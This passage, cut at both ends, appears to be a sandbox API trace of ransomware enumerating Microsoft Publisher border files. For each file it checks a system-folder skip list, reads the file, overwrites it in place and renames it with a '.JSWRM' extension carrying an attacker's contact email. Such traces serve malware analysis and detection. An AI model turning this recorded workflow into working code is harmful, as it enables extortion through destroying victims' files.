"c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub3b.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.959] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2169a085, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2169a085, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc144, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB4.BDR", cAlternateFileName="")) returned 1 [0139.959] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2=".") returned 1 [0139.959] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="..") returned 1 [0139.959] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="...") returned 1 [0139.959] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="windows") returned -1 [0139.959] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="recovery") returned -1 [0139.959] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="perflogs") returned -1 [0139.959] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="documents and settings") returned 1 [0139.960] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.960] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="system volume information") returned -1 [0139.960] lstrcmpiW (lpString1="MSPUB4.BDR", lpString2="msocache") returned 1 [0139.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB4.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB4.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB4.BDR", lpUsedDefaultChar=0x0) returned 10 [0139.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB4.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB4.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB4.BDR", lpUsedDefaultChar=0x0) returned 10 [0139.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB4.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub4.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.961] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=49476) returned 1 [0139.961] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.961] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xc140, lpOverlapped=0x0) returned 1 [0139.965] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.965] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xc140, lpOverlapped=0x0) returned 1 [0139.965] CloseHandle (hObject=0x238) returned 1 [0139.965] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB4.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub4.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB4.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub4.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.966] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcfb4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB5A.BDR", cAlternateFileName="")) returned 1 [0139.966] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2=".") returned 1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="..") returned 1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="...") returned 1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="windows") returned -1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="recovery") returned -1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="perflogs") returned -1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="documents and settings") returned 1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="system volume information") returned -1 [0139.967] lstrcmpiW (lpString1="MSPUB5A.BDR", lpString2="msocache") returned 1 [0139.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5A.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB5A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5A.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB5A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB5A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub5a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.006] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=53172) returned 1 [0140.006] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.006] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xcfb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xcfb0, lpOverlapped=0x0) returned 1 [0140.078] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.078] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xcfb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xcfb0, lpOverlapped=0x0) returned 1 [0140.079] CloseHandle (hObject=0x238) returned 1 [0140.079] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB5A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub5a.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB5A.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub5a.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.081] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2476, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB5B.BDR", cAlternateFileName="")) returned 1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2=".") returned 1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="..") returned 1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="...") returned 1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="windows") returned -1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="recovery") returned -1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="perflogs") returned -1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="documents and settings") returned 1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="$RECYCLE.BIN") returned 1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="system volume information") returned -1 [0140.081] lstrcmpiW (lpString1="MSPUB5B.BDR", lpString2="msocache") returned 1 [0140.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5B.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB5B.BDR", lpUsedDefaultChar=0x0) returned 11 [0140.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB5B.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB5B.BDR", lpUsedDefaultChar=0x0) returned 11 [0140.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB5B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub5b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.083] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9334) returned 1 [0140.083] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.083] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2470, lpOverlapped=0x0) returned 1 [0140.086] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.086] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2470, lpOverlapped=0x0) returned 1 [0140.086] CloseHandle (hObject=0x238) returned 1 [0140.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB5B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub5b.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB5B.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub5b.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.088] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x245d6b52, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x245d6b52, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245fcdca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f46, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB6.BDR", cAlternateFileName="")) returned 1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2=".") returned 1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="..") returned 1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="...") returned 1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="windows") returned -1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="recovery") returned -1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="perflogs") returned -1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="documents and settings") returned 1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="$RECYCLE.BIN") returned 1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="system volume information") returned -1 [0140.088] lstrcmpiW (lpString1="MSPUB6.BDR", lpString2="msocache") returned 1 [0140.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB6.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB6.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB6.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB6.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB6.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB6.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB6.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub6.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.090] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32582) returned 1 [0140.090] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.090] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7f40, lpOverlapped=0x0) returned 1 [0140.093] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.093] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7f40, lpOverlapped=0x0) returned 1 [0140.093] CloseHandle (hObject=0x238) returned 1 [0140.093] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB6.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub6.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB6.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub6.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.118] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233cee41, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x799a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB7.BDR", cAlternateFileName="")) returned 1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2=".") returned 1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="..") returned 1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="...") returned 1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="windows") returned -1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="recovery") returned -1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="perflogs") returned -1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="documents and settings") returned 1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="$RECYCLE.BIN") returned 1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="system volume information") returned -1 [0140.118] lstrcmpiW (lpString1="MSPUB7.BDR", lpString2="msocache") returned 1 [0140.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB7.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB7.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB7.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB7.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB7.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB7.BDR", lpUsedDefaultChar=0x0) returned 10 [0140.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB7.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub7.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.120] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31130) returned 1 [0140.120] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.120] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7990, lpOverlapped=0x0) returned 1 [0140.124] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.124] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7990, lpOverlapped=0x0) returned 1 [0140.124] CloseHandle (hObject=0x238) returned 1 [0140.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB7.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub7.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB7.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub7.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.125] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22986bc2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22986bc2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22986bc2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe6aa, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB8.BDR", cAlternateFileName="")) returned 1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2=".") returned 1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="..") returned 1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="...") returned 1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="windows") returned -1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="recovery") returned -1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="perflogs") returned -1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="documents and settings") returned 1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="$RECYCLE.BIN") returned 1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="system volume information") returned -1 [0140.125] lstrcmpiW (lpString1="MSPUB8.BDR", lpString2="msocache") returned 1 [0140.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB8.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.126] WideCharToMultiByte (in: 